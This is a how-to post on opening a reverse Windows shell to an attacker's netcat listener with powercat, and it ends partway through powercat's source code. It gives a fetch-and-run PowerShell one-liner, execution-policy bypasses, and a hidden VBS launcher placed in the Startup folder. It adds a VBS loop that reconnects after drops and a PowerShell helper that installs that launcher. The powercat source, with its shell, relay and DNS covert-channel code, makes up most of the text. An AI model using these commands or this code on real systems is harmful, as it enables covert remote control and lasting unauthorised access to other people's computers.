Reverse Windows shell

  • Method: PowerShell on the target + nc on the attacker machine

  1. On the attacker machine run: nc -l 2222 (OpenBSD nc syntax; the traditional netcat build needs nc -l -p 2222, and adding -v shows when the connection arrives)

  2. On the target (192.168.1.120 is the attacker's address). The download and the powercat call have to run in the same PowerShell process, so this is one command line; typed as two separate lines, the function defined by IEX is gone before powercat is called:
powershell -Command "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.120 -p 2222 -e cmd"

Problems encountered:

  • curl : The remote name could not be resolved: 'raw.githubusercontent.com'
    • The target cannot reach GitHub (no DNS or no route out), so the script cannot be fetched remotely; curl here is Windows PowerShell's alias for Invoke-WebRequest, not curl.exe
    • Workaround: get the file onto the target some other way, save it as powercat.ps1, then load it from a PowerShell session and run:
Import-Module ./powercat.ps1
powercat -c 192.168.1.120 -p 2222 -e cmd

How to make it start in the background at boot: use a VBS script that launches the bat file (the 0 passed as the second argument to Run hides the window)

Set ws = WScript.CreateObject("WScript.Shell")
ws.Run "C:\Users\yaozhengbing\Desktop\shell.bat /start", 0

On Windows press Win+R and enter shell:common startup to open the Startup folder, then put the script there. shell:common startup is the all-users folder (under C:\ProgramData) and needs admin rights to write to; shell:startup is the current user's folder and works without elevation.
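The Startup-folder step above, as an added PowerShell example that is not code from the original post: it resolves both Startup folders through the shell API instead of the Win+R shortcut, writes the same two-line VBS launcher, and lists what is already registered there. The batch path is the post's; the function names Get-StartupFolders, Install-StartupLauncher and Get-StartupEntries and their parameters are this example's own.

```powershell
# Added example, not code from the original post. The batch file path is the post's;
# the function names and parameters are assumptions made here.
function Get-StartupFolders {
    # shell:startup        -> per-user folder, writable by the logged-on user
    # shell:common startup -> all-users folder, needs an elevated prompt to write
    @{
        CurrentUser = [Environment]::GetFolderPath([Environment+SpecialFolder]::Startup)
        AllUsers    = [Environment]::GetFolderPath([Environment+SpecialFolder]::CommonStartup)
    }
}

function Install-StartupLauncher {
    param(
        [Parameter(Mandatory = $true)][string]$BatchPath,   # the .bat the VBS should run
        [string]$Name = 'shell.vbs',
        [switch]$AllUsers                                   # use shell:common startup
    )
    $folders = Get-StartupFolders
    $folder  = if ($AllUsers) { $folders.AllUsers } else { $folders.CurrentUser }

    # Same two-line launcher as in the post. The path is wrapped in doubled quotes so
    # WScript.Shell.Run does not split it at spaces; 0 = run with a hidden window.
    $vbs = @(
        'Set ws = WScript.CreateObject("WScript.Shell")'
        ('ws.Run """{0}""", 0' -f $BatchPath)
    ) -join "`r`n"

    $target = Join-Path -Path $folder -ChildPath $Name
    try {
        Set-Content -LiteralPath $target -Value $vbs -Encoding Ascii -ErrorAction Stop
    } catch {
        throw "Could not write $target (the all-users folder needs an elevated prompt): $($_.Exception.Message)"
    }
    return $target
}

function Get-StartupEntries {
    # Everything that will run at logon from either folder; also the first place to
    # look when checking a host for this kind of persistence.
    foreach ($kv in (Get-StartupFolders).GetEnumerator()) {
        Get-ChildItem -LiteralPath $kv.Value -File -ErrorAction SilentlyContinue |
            ForEach-Object {
                [pscustomobject]@{
                    Scope         = $kv.Key
                    Name          = $_.Name
                    LastWriteTime = $_.LastWriteTime
                    FullName      = $_.FullName
                }
            }
    }
}

# Usage (per-user, no admin needed):
#   Install-StartupLauncher -BatchPath 'C:\Users\yaozhengbing\Desktop\shell.bat'
#   Get-StartupEntries | Format-Table -AutoSize
```

Install-StartupLauncher defaults to the per-user folder because that is the one a non-elevated shell can write to; -AllUsers selects the shell:common startup folder from the post and fails with a clear message when the prompt is not elevated.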


  • "Running scripts is disabled on this system"
    • This only bites when powercat is loaded from a .ps1 file; the IEX (DownloadString) one-liner runs the code in memory and is never checked against the execution policy
    • Change the execution policy: Set-ExecutionPolicy RemoteSigned
    • Without -Scope this changes the LocalMachine policy and needs an elevated prompt; as a normal user use Set-ExecutionPolicy RemoteSigned -Scope CurrentUser, or skip the policy change entirely with a per-process powershell -ExecutionPolicy Bypass
      Putting it together, run on the target from cmd.exe (no PowerShell session needed). The policy change has to come before Import-Module, otherwise Import-Module is the command that gets blocked:
powershell -Command "Set-ExecutionPolicy RemoteSigned; Import-Module C:\Windows\windows.ps1; powercat -c 192.168.1.120 -p 2222 -e cmd"

To keep the connection coming back after it drops, wrap the command in a VBS loop that restarts powershell every time it exits (so it can be launched from the same startup script as above):

Set ws = WScript.CreateObject("WScript.Shell")
Do
  ' third argument True: wait for this powershell to exit (shell closed or connect timed out), then reconnect
  ws.Run "powershell -Command ""Set-ExecutionPolicy RemoteSigned; Import-Module C:\Windows\windows.ps1; powercat -c 192.168.1.120 -p 2222 -e cmd""", 0, True
  WScript.Sleep 5000
Loop

powercat's own -rep switch (see the help text below) does the same restart from inside PowerShell.
Save the following script as powercat.ps1 (this is the powercat.ps1 from the repository linked above):

function powercat
{
  param(
    [alias("Client")][string]$c="",
    [alias("Listen")][switch]$l=$False,
    [alias("Port")][Parameter(Position=-1)][string]$p="",
    [alias("Execute")][string]$e="",
    [alias("ExecutePowershell")][switch]$ep=$False,
    [alias("Relay")][string]$r="",
    [alias("UDP")][switch]$u=$False,
    [alias("dnscat2")][string]$dns="",
    [alias("DNSFailureThreshold")][int32]$dnsft=10,
    [alias("Timeout")][int32]$t=60,
    [Parameter(ValueFromPipeline=$True)][alias("Input")]$i=$null,
    [ValidateSet('Host', 'Bytes', 'String')][alias("OutputType")][string]$o="Host",
    [alias("OutputFile")][string]$of="",
    [alias("Disconnect")][switch]$d=$False,
    [alias("Repeater")][switch]$rep=$False,
    [alias("GeneratePayload")][switch]$g=$False,
    [alias("GenerateEncoded")][switch]$ge=$False,
    [alias("Help")][switch]$h=$False
  )

############### HELP ###############
$Help = "
powercat - Netcat, The Powershell Version
Github Repository: https://github.com/besimorhino/powercat

This script attempts to implement the features of netcat in a powershell
script. It also contains extra features such as built-in relays, execute
powershell, and a dnscat2 client.

Usage: powercat [-c or -l] [-p port] [options]

-c Client Mode. Provide the IP of the system you wish to connect to.
If you are using -dns, specify the DNS Server to send queries to.

-l Listen Mode. Start a listener on the port specified by -p.

-p Port. The port to connect to, or the port to listen on.

-e Execute. Specify the name of the process to start.

-ep Execute Powershell. Start a pseudo powershell session. You can
declare variables and execute commands, but if you try to enter
another shell (nslookup, netsh, cmd, etc.) the shell will hang.

-r Relay. Used for relaying network traffic between two nodes.
Client Relay Format: -r <tcp/udp>:<ip>:<port>
Listener Relay Format: -r <tcp/udp>:<port>
DNSCat2 Relay Format: -r dns:<dns server>:<dns port>:<domain>

-u UDP Mode. Send traffic over UDP. Because it's UDP, the client
must send data before the server can respond.

-dns DNS Mode. Send traffic over the dnscat2 dns covert channel.
Specify the dns server to -c, the dns port to -p, and specify the
domain to this option, -dns. This is only a client.
Get the server here: https://github.com/iagox86/dnscat2

-dnsft DNS Failure Threshold. This is how many bad packets the client can
recieve before exiting. Set to zero when receiving files, and set high
for more stability over the internet.

-t Timeout. The number of seconds to wait before giving up on listening or
connecting. Default: 60

-i Input. Provide data to be sent down the pipe as soon as a connection is
established. Used for moving files. You can provide the path to a file,
a byte array object, or a string. You can also pipe any of those into
powercat, like 'aaaaaa' | powercat -c 10.1.1.1 -p 80

-o Output. Specify how powercat should return information to the console.
Valid options are 'Bytes', 'String', or 'Host'. Default is 'Host'.

-of Output File. Specify the path to a file to write output to.

-d Disconnect. powercat will disconnect after the connection is established
and the input from -i is sent. Used for scanning.

-rep Repeater. powercat will continually restart after it is disconnected.
Used for setting up a persistent server.

-g Generate Payload. Returns a script as a string which will execute the
powercat with the options you have specified. -i, -d, and -rep will not
be incorporated.

-ge Generate Encoded Payload. Does the same as -g, but returns a string which
can be executed in this way: powershell -E <encoded string>

-h Print this help message.

Examples:

Listen on port 8000 and print the output to the console.
powercat -l -p 8000

Connect to 10.1.1.1 port 443, send a shell, and enable verbosity.
powercat -c 10.1.1.1 -p 443 -e cmd -v

Connect to the dnscat2 server on c2.example.com, and send dns queries
to the dns server on 10.1.1.1 port 53.
powercat -c 10.1.1.1 -p 53 -dns c2.example.com

Send a file to 10.1.1.15 port 8000.
powercat -c 10.1.1.15 -p 8000 -i C:\inputfile

Write the data sent to the local listener on port 4444 to C:\outfile
powercat -l -p 4444 -of C:\outfile

Listen on port 8000 and repeatedly serve a powershell shell.
powercat -l -p 8000 -ep -rep

Relay traffic coming in on port 8000 over tcp to port 9000 on 10.1.1.1 over tcp.
powercat -l -p 8000 -r tcp:10.1.1.1:9000

Relay traffic coming in on port 8000 over tcp to the dnscat2 server on c2.example.com,
sending queries to 10.1.1.1 port 53.
powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
"
if($h){return $Help}
############### HELP ###############

############### VALIDATE ARGS ###############
$global:Verbose = $Verbose
if($of -ne ''){$o = 'Bytes'}

if($dns -eq "")
{
  if((($c -eq "") -and (!$l)) -or (($c -ne "") -and $l)){return "You must select either client mode (-c) or listen mode (-l)."}
  if($p -eq ""){return "Please provide a port number to -p."}
}
if(((($r -ne "") -and ($e -ne "")) -or (($e -ne "") -and ($ep))) -or (($r -ne "") -and ($ep))){return "You can only pick one of these: -e, -ep, -r"}
if(($i -ne $null) -and (($r -ne "") -or ($e -ne ""))){return "-i is not applicable here."}
if($l)
{
  $Failure = $False
  netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $p){Write-Output ("The selected port " + $p + " is already in use.") ; $Failure=$True}}
  if($Failure){break}
}
if($r -ne "")
{
  if($r.split(":").Count -eq 2)
  {
    $Failure = $False
    netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $r.split(":")[1]){Write-Output ("The selected port " + $r.split(":")[1] + " is already in use.") ; $Failure=$True}}
    if($Failure){break}
  }
}
############### VALIDATE ARGS ###############

############### UDP FUNCTIONS ###############
function Setup_UDP
{
  param($FuncSetupVars)
  if($global:Verbose){$Verbose = $True}
  $c,$l,$p,$t = $FuncSetupVars
  $FuncVars = @{}
  $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
  if($l)
  {
    $SocketDestinationBuffer = New-Object System.Byte[] 65536
    $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any), $p
    $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient $p
    $PacketInfo = New-Object System.Net.Sockets.IPPacketInformation
    Write-Verbose ("Listening on [0.0.0.0] port " + $p + " [udp]")
    $ConnectHandle = $FuncVars["Socket"].Client.BeginReceiveMessageFrom($SocketDestinationBuffer,0,65536,[System.Net.Sockets.SocketFlags]::None,[ref]$EndPoint,$null,$null)
    $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
    while($True)
    {
      if($Host.UI.RawUI.KeyAvailable)
      {
        if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown,IncludeKeyUp").VirtualKeyCode))
        {
          Write-Verbose "CTRL or ESC caught. Stopping UDP Setup..."
          $FuncVars["Socket"].Close()
          $Stopwatch.Stop()
          break
        }
      }
      if($Stopwatch.Elapsed.TotalSeconds -gt $t)
      {
        $FuncVars["Socket"].Close()
        $Stopwatch.Stop()
        Write-Verbose "Timeout!" ; break
      }
      if($ConnectHandle.IsCompleted)
      {
        $SocketBytesRead = $FuncVars["Socket"].Client.EndReceiveMessageFrom($ConnectHandle,[ref]0,[ref]$EndPoint,[ref]$PacketInfo)
        Write-Verbose ("Connection from [" + $EndPoint.Address.IPAddressToString + "] port " + $p + " [udp] accepted (source port " + $EndPoint.Port + ")")
        if($SocketBytesRead -gt 0){break}
        else{break}
      }
    }
    $Stopwatch.Stop()
    $FuncVars["InitialConnectionBytes"] = $SocketDestinationBuffer[0..([int]$SocketBytesRead-1)]
  }
  else
  {
    if(!$c.Contains("."))
    {
      $IPList = @()
      [System.Net.Dns]::GetHostAddresses($c) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | %{$IPList += $_.IPAddressToString}
      Write-Verbose ("Name " + $c + " resolved to address " + $IPList[0])
      $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($IPList[0])), $p
    }
    else
    {
      $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($c)), $p
    }
    $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient
    $FuncVars["Socket"].Connect($c,$p)
    Write-Verbose ("Sending UDP traffic to " + $c + " port " + $p + "...")
    Write-Verbose ("UDP: Make sure to send some data so the server can notice you!")
  }
  $FuncVars["BufferSize"] = 65536
  $FuncVars["EndPoint"] = $EndPoint
  $FuncVars["StreamDestinationBuffer"] = New-Object System.Byte[] $FuncVars["BufferSize"]
  $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null)
  return $FuncVars
}
function ReadData_UDP
{
  param($FuncVars)
  $Data = $null
  if($FuncVars["StreamReadOperation"].IsCompleted)
  {
    $StreamBytesRead = $FuncVars["Socket"].Client.EndReceiveFrom($FuncVars["StreamReadOperation"],[ref]$FuncVars["EndPoint"])
    if($StreamBytesRead -eq 0){break}
    $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)]
    $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null)
  }
  return $Data,$FuncVars
}
function WriteData_UDP
{
  param($Data,$FuncVars)
  $FuncVars["Socket"].Client.SendTo($Data,$FuncVars["EndPoint"]) | Out-Null
  return $FuncVars
}
function Close_UDP
{
  param($FuncVars)
  $FuncVars["Socket"].Close()
}
############### UDP FUNCTIONS ###############

############### DNS FUNCTIONS ###############
function Setup_DNS
{
  param($FuncSetupVars)
  if($global:Verbose){$Verbose = $True}
function ConvertTo-HexArray
{
  param($String)
  $Hex = @()
  $String.ToCharArray() | % {"{0:x}" -f [byte]$_} | % {if($_.Length -eq 1){"0" + [string]$_} else{[string]$_}} | % {$Hex += $_}
return $Hex
}

function SendPacket
{
  param($Packet,$DNSServer,$DNSPort)
  $Command = ("set type=TXT`nserver $DNSServer`nset port=$DNSPort`nset domain=.com`nset retry=1`n" + $Packet + "`nexit")
  $result = ($Command | nslookup 2>&1 | Out-String)
  if($result.Contains('"')){return ([regex]::Match($result.replace("bio=",""),'(?<=")[^"]*(?=")').Value)}
  else{return 1}
}

function Create_SYN
{
  param($SessionId,$SeqNum,$Tag,$Domain)
  return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "00" + $SessionId + $SeqNum + "0000" + $Domain)
}

function Create_FIN
{
  param($SessionId,$Tag,$Domain)
  return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "02" + $SessionId + "00" + $Domain)
}

function Create_MSG
{
  param($SessionId,$SeqNum,$AcknowledgementNumber,$Data,$Tag,$Domain)
  return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "01" + $SessionId + $SeqNum + $AcknowledgementNumber + $Data + $Domain)
}

function DecodePacket
{
  param($Packet)

  if((($Packet.Length)%2 -eq 1) -or ($Packet.Length -eq 0)){return 1}
  $AcknowledgementNumber = ($Packet[10..13] -join "")
  $SeqNum = ($Packet[14..17] -join "")
  [byte[]]$ReturningData = @()

  if($Packet.Length -gt 18)
  {
    $PacketElim = $Packet.Substring(18)
    while($PacketElim.Length -gt 0)
    {
      $ReturningData += [byte[]][Convert]::ToInt16(($PacketElim[0..1] -join ""),16)
      $PacketElim = $PacketElim.Substring(2)
    }
  }

  return $Packet,$ReturningData,$AcknowledgementNumber,$SeqNum
}

function AcknowledgeData
{
  param($ReturningData,$AcknowledgementNumber)
  $Hex = [string]("{0:x}" -f (([uint16]("0x" + $AcknowledgementNumber) + $ReturningData.Length) % 65535))
  if($Hex.Length -ne 4){$Hex = (("0"*(4-$Hex.Length)) + $Hex)}
  return $Hex
}
$FuncVars = @{}
$FuncVars["DNSServer"],$FuncVars["DNSPort"],$FuncVars["Domain"],$FuncVars["FailureThreshold"] = $FuncSetupVars
if($FuncVars["DNSPort"] -eq ''){$FuncVars["DNSPort"] = "53"}
$FuncVars["Tag"] = ""
$FuncVars["Domain"] = ("." + $FuncVars["Domain"])

$FuncVars["Create_SYN"] = ${function:Create_SYN}
$FuncVars["Create_MSG"] = ${function:Create_MSG}
$FuncVars["Create_FIN"] = ${function:Create_FIN}
$FuncVars["DecodePacket"] = ${function:DecodePacket}
$FuncVars["ConvertTo-HexArray"] = ${function:ConvertTo-HexArray}
$FuncVars["AckData"] = ${function:AcknowledgeData}
$FuncVars["SendPacket"] = ${function:SendPacket}
$FuncVars["SessionId"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
$FuncVars["SeqNum"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
$FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
$FuncVars["Failures"] = 0

$SYNPacket = (Invoke-Command $FuncVars["Create_SYN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["Tag"],$FuncVars["Domain"]))
$ResponsePacket = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($SYNPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))
$DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($ResponsePacket))
if($DecodedPacket -eq 1){return "Bad SYN response. Ensure your server is set up correctly."}
$ReturningData = $DecodedPacket[1]
if($ReturningData -ne ""){$FuncVars["InputData"] = ""}
$FuncVars["AckNum"] = $DecodedPacket[2]
$FuncVars["MaxMSGDataSize"] = (244 - (Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],"",$FuncVars["Tag"],$FuncVars["Domain"])).Length)
if($FuncVars["MaxMSGDataSize"] -le 0){return "Domain name is too long."}
return $FuncVars

}
function ReadData_DNS
{
param($FuncVars)
if($global:Verbose){$Verbose = $True}

$PacketsData = @()
$PacketData = ""

if($FuncVars["InputData"] -ne $null)
{
  $Hex = (Invoke-Command $FuncVars["ConvertTo-HexArray"] -ArgumentList @($FuncVars["InputData"]))
  $SectionCount = 0
  $PacketCount = 0
  foreach($Char in $Hex)
  {
    if($SectionCount -ge 30)
    {
      $SectionCount = 0
      $PacketData += "."
    }
    if($PacketCount -ge ($FuncVars["MaxMSGDataSize"]))
    {
      $PacketsData += $PacketData.TrimEnd(".")
      $PacketCount = 0
      $SectionCount = 0
      $PacketData = ""
    }
    $PacketData += $Char
    $SectionCount += 2
    $PacketCount += 2
  }
  $PacketData = $PacketData.TrimEnd(".")
  $PacketsData += $PacketData
  $FuncVars["InputData"] = ""
}
else
{
  $PacketsData = @("")
}

[byte[]]$ReturningData = @()
foreach($PacketData in $PacketsData)
{
  try{$MSGPacket = Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],$PacketData,$FuncVars["Tag"],$FuncVars["Domain"])}
  catch{ Write-Verbose "DNSCAT2: Failed to create packet." ; $FuncVars["Failures"] += 1 ; continue }
  try{$Packet = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($MSGPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))}
  catch{ Write-Verbose "DNSCAT2: Failed to send packet." ; $FuncVars["Failures"] += 1 ; continue }
  try
  {
    $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($Packet))
    if($DecodedPacket.Length -ne 4){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..."; $FuncVars["Failures"] += 1 ; continue }
    $FuncVars["AckNum"] = $DecodedPacket[2]
    $FuncVars["SeqNum"] = $DecodedPacket[3]
    $ReturningData += $DecodedPacket[1]
  }
  catch{ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }
  if($DecodedPacket -eq 1){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }
}

if($FuncVars["Failures"] -ge $FuncVars["FailureThreshold"]){break}

if($ReturningData -ne @())
{
  $FuncVars["AckNum"] = (Invoke-Command $FuncVars["AckData"] -ArgumentList @($ReturningData,$FuncVars["AckNum"]))
}
return $ReturningData,$FuncVars

}
function WriteData_DNS
{
  param($Data,$FuncVars)
  $FuncVars["InputData"] = $FuncVars["Encoding"].GetString($Data)
  return $FuncVars
}
function Close_DNS
{
  param($FuncVars)
  $FINPacket = Invoke-Command $FuncVars["Create_FIN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["Tag"],$FuncVars["Domain"])
  Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($FINPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]) | Out-Null
}
############### DNS FUNCTIONS ###############

########## TCP FUNCTIONS ##########
function Setup_TCP
{
param($FuncSetupVars)
  $c,$l,$p,$t = $FuncSetupVars
  if($global:Verbose){$Verbose = $True}
  $FuncVars = @{}
  if(!$l)
  {
    $FuncVars["l"] = $False
    $Socket = New-Object System.Net.Sockets.TcpClient
    Write-Verbose "Connecting..."
    $Handle = $Socket.BeginConnect($c,$p,$null,$null)
  }
  else
  {
    $FuncVars["l"] = $True
    Write-Verbose ("Listening on [0.0.0.0] (port " + $p + ")")
    $Socket = New-Object System.Net.Sockets.TcpListener $p
    $Socket.Start()
    $Handle = $Socket.BeginAcceptTcpClient($null, $null)
}

$Stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
while($True)
{
  if($Host.UI.RawUI.KeyAvailable)
  {
    if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown,IncludeKeyUp").VirtualKeyCode))
    {
      Write-Verbose "CTRL or ESC caught. Stopping TCP Setup..."
      if($FuncVars["l"]){$Socket.Stop()}
      else{$Socket.Close()}
      $Stopwatch.Stop()
      break
    }
  }
  if($Stopwatch.Elapsed.TotalSeconds -gt $t)
  {
    if(!$l){$Socket.Close()}
    else{$Socket.Stop()}
    $Stopwatch.Stop()
    Write-Verbose "Timeout!" ; break
    break
  }
  if($Handle.IsCompleted)
  {
    if(!$l)
    {
      try
      {
        $Socket.EndConnect($Handle)
        $Stream = $Socket.GetStream()
        $BufferSize = $Socket.ReceiveBufferSize
        Write-Verbose ("Connection to " + $c + ":" + $p + " [tcp] succeeded!")
      }
      catch{$Socket.Close(); $Stopwatch.Stop(); break}
    }
    else
    {
      $Client = $Socket.EndAcceptTcpClient($Handle)
      $Stream = $Client.GetStream()
      $BufferSize = $Client.ReceiveBufferSize
      Write-Verbose ("Connection from [" + $Client.Client.RemoteEndPoint.Address.IPAddressToString + "] port " + $p + " [tcp] accepted (source port " + $Client.Client.RemoteEndPoint.Port + ")")
    }
    break
  }
}
$Stopwatch.Stop()
if($Socket -eq $null){break}
$FuncVars["Stream"] = $Stream
$FuncVars["Socket"] = $Socket
$FuncVars["BufferSize"] = $BufferSize
$FuncVars["StreamDestinationBuffer"] = (New-Object System.Byte[] $FuncVars["BufferSize"])
$FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null)
$FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
$FuncVars["StreamBytesRead"] = 1
return $FuncVars

}
function ReadData_TCP
{
param($FuncVars)
  $Data = $null
  if($FuncVars["StreamBytesRead"] -eq 0){break}
  if($FuncVars["StreamReadOperation"].IsCompleted)
  {
    $StreamBytesRead = $FuncVars["Stream"].EndRead($FuncVars["StreamReadOperation"])
    if($StreamBytesRead -eq 0){break}
    $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)]
    $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null)
  }
  return $Data,$FuncVars
}
function WriteData_TCP
{
  param($Data,$FuncVars)
  $FuncVars["Stream"].Write($Data, 0, $Data.Length)
  return $FuncVars
}
function Close_TCP
{
  param($FuncVars)
  try{$FuncVars["Stream"].Close()}
  catch{}
  if($FuncVars["l"]){$FuncVars["Socket"].Stop()}
  else{$FuncVars["Socket"].Close()}
}
########## TCP FUNCTIONS ##########

########## CMD FUNCTIONS ##########
function Setup_CMD
{
  param($FuncSetupVars)
  if($global:Verbose){$Verbose = $True}
  $FuncVars = @{}
  $ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo
  $ProcessStartInfo.FileName = $FuncSetupVars[0]
  $ProcessStartInfo.UseShellExecute = $False
  $ProcessStartInfo.RedirectStandardInput = $True
  $ProcessStartInfo.RedirectStandardOutput = $True
  $ProcessStartInfo.RedirectStandardError = $True
  $FuncVars["Process"] = [System.Diagnostics.Process]::Start($ProcessStartInfo)
  Write-Verbose ("Starting Process " + $FuncSetupVars[0] + "...")
  $FuncVars["Process"].Start() | Out-Null
  $FuncVars["StdOutDestinationBuffer"] = New-Object System.Byte[] 65536
  $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null)
  $FuncVars["StdErrDestinationBuffer"] = New-Object System.Byte[] 65536
  $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null)
  $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
  return $FuncVars
}
function ReadData_CMD
{
  param($FuncVars)
  [byte[]]$Data = @()
  if($FuncVars["StdOutReadOperation"].IsCompleted)
  {
    $StdOutBytesRead = $FuncVars["Process"].StandardOutput.BaseStream.EndRead($FuncVars["StdOutReadOperation"])
    if($StdOutBytesRead -eq 0){break}
    $Data += $FuncVars["StdOutDestinationBuffer"][0..([int]$StdOutBytesRead-1)]
    $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null)
  }
  if($FuncVars["StdErrReadOperation"].IsCompleted)
  {
    $StdErrBytesRead = $FuncVars["Process"].StandardError.BaseStream.EndRead($FuncVars["StdErrReadOperation"])
    if($StdErrBytesRead -eq 0){break}
    $Data += $FuncVars["StdErrDestinationBuffer"][0..([int]$StdErrBytesRead-1)]
    $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null)
  }
  return $Data,$FuncVars
}
function WriteData_CMD
{
  param($Data,$FuncVars)
  $FuncVars["Process"].StandardInput.WriteLine($FuncVars["Encoding"].GetString($Data).TrimEnd("`r").TrimEnd("`n"))
  return $FuncVars
}
function Close_CMD
{
  param($FuncVars)
  $FuncVars["Process"] | Stop-Process
}
########## CMD FUNCTIONS ##########

########## POWERSHELL FUNCTIONS ##########
function Main_Powershell
{
param($Stream1SetupVars)
try
{
  $encoding = New-Object System.Text.AsciiEncoding
  [byte[]]$InputToWrite = @()
  if($i -ne $null)
  {
    Write-Verbose "Input from -i detected..."
    if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) }
    elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i }
    elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) }
    else{Write-Host "Unrecognised input type." ; return}
}

  Write-Verbose "Setting up Stream 1... (ESC/CTRL to exit)"
  try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
  catch{Write-Verbose "Stream 1 Setup Failure" ; return}

  Write-Verbose "Setting up Stream 2... (ESC/CTRL to exit)"
  try
  {
    $IntroPrompt = $Encoding.GetBytes("Windows PowerShell`nCopyright (C) 2013 Microsoft Corporation. All rights reserved.`n`n" + ("PS " + (pwd).Path + "> "))
    $Prompt = ("PS " + (pwd).Path + "> ")
    $CommandToExecute = ""
    $Data = $null
  }
  catch
  {
    Write-Verbose "Stream 2 Setup Failure" ; return
  }

  if($InputToWrite -ne @())
  {
    Write-Verbose "Writing input to Stream 1..."
    try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
    catch{Write-Host "Failed to write input to Stream 1" ; return}
  }

  if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}

  Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
  while($True)
  {
    try
    {
      ##### Stream2 Read #####
      $Prompt = $null
      $ReturnedData = $null
      if($CommandToExecute -ne "")
      {
        try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}
        catch{[byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))}
        $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> "))
      }
      $Data += $IntroPrompt
      $IntroPrompt = $null
      $Data += $ReturnedData
      $Data += $Prompt
      $CommandToExecute = ""
      ##### Stream2 Read #####

      if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
      $Data = $null
    }
    catch
    {
      Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return
    }

    try
    {
      $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
      if($Data.Length -eq 0){Start-Sleep -Milliseconds 100}
      if($Data -ne $null){$CommandToExecute = $Encoding.GetString($Data)}
      $Data = $null
    }
    catch
    {
      Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
    }
  }
